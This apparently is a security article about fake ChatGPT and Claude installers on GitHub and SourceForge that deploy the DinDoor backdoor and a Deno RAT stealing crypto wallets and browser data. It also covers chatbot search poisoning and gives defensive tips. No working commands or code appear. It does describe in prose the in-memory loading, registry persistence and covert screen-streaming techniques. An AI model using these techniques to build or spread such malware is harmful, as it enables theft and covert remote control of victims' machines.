What Fake AI Installers Are and Why Developers Should Care
Fake AI installers are malicious downloads that pretend to be setup files or plugins for tools like ChatGPT or Claude, but instead install remote access malware that can hijack browsers, steal cryptocurrency wallets, and give attackers long-term control over a developer’s machine. Attackers are abusing trusted platforms such as GitHub and SourceForge to host counterfeit installers and scripts disguised as popular AI tools and audio software, then promoting them through compromised YouTube channels that have gathered more than 50,000 views. These look like normal community projects or unofficial ports, which makes them believable to developers, creators, and power users who are comfortable running scripts from open-source repositories. In reality, the installers deploy a Deno-based RAT through a backdoor called DinDoor, turning a routine “download and run this command” experience into a silent compromise aimed at crypto wallet theft and persistent remote access.
How Deno RAT Malware Sneaks In Through GitHub and SourceForge
The fake AI installers arrive as GitHub or SourceForge projects with instructions to open a terminal and paste a one-line command for Windows or macOS. That command pulls down an MSI or PowerShell script that installs Scoop and WinGet, then uses them to install the legitimate Deno runtime. Instead of shipping an obvious binary, attackers use Deno to fetch and run the DinDoor backdoor directly from a remote server, with the next stage executed in memory via standard input so no payload hits disk. DinDoor creates a registry Run key for persistence, reports system details to a command-and-control server, and downloads more components, including a Deno RAT previously tracked as Smokest. According to Malwarebytes, attackers rotate GitHub accounts and create multiple repositories per account, quickly replacing projects as they are taken down, which makes GitHub malware detection harder for users who only glance at star counts or clone stats.
What Deno RAT Can Do: From Crypto Wallet Theft to Stealth Screen Streaming
Once running, the Deno RAT gives attackers broad control of an infected system. It can execute commands and PowerShell scripts, manage files and processes, and open SOCKS5 proxy tunnels, turning the victim machine into an access point. Its stealer module focuses on crypto wallet theft, targeting more than 50 browser wallet extensions and 10 desktop wallet apps such as Atomic Wallet, Exodus, Electrum, and ByteCoin, along with data from Chrome, Brave, Edge, Opera, Vivaldi, and other Chromium-based browsers plus Telegram, Discord, and Lightcord. One feature stands out for developer security threats: to stream a live view of the victim’s screen, the RAT silently launches Microsoft Edge, connects via the Chrome DevTools Protocol, and injects a WebRTC page, sending encrypted video frames peer-to-peer through a normal browser process that blends into network traffic.
AI Chatbots, Search Poisoning, and the New Supply Chain Attack Surface
These fake AI installers are part of a wider trend where attackers abuse both trusted tooling and modern discovery channels. GitHub and SourceForge add credibility, while Scoop, WinGet, and Deno look like ordinary developer tools in logs. At the same time, Microsoft has observed attackers using AI chatbots to recommend malicious download sites impersonating utilities like CrystalDiskInfo, HWMonitor, Display Driver Uninstaller, FurMark, K-Lite Codec Pack, and PDFgear. This AI search result poisoning extends traditional SEO poisoning: users ask a chatbot for a download, receive a link to an attacker-controlled domain, then install malware that includes cryptojacking payloads and persistent ScreenConnect access for data theft or ransomware. According to Microsoft Defender Experts, these campaigns focus on high-value systems rather than mass infection, showing how supply chain attacks against development and performance tools are becoming a favored path to credentials, GPU power, and digital assets.
How Developers Can Spot and Avoid Fake AI Installers
Developers can cut the risk by treating every installer and one-line setup command with suspicion, especially for AI tools. First, verify the official download source: cross-check domains and repository links from the vendor’s main website instead of following YouTube descriptions, chatbot answers, or random blogs. Look for repository verification badges or organization accounts; be wary of brand-new personal accounts hosting "official" ChatGPT or Claude installers. Before running scripts, open them in a text editor or IDE and scan for steps that install unexpected package managers, fetch remote scripts, or pipe content directly into interpreters like Deno, PowerShell, or bash. Avoid copy-pasting commands that curl or Invoke-WebRequest directly into a shell. For GitHub malware detection on your own systems, keep endpoint protection and browser extensions that flag suspicious domains enabled. Finally, restrict where private keys and crypto wallets are stored, and separate development and wallet usage across different profiles or machines.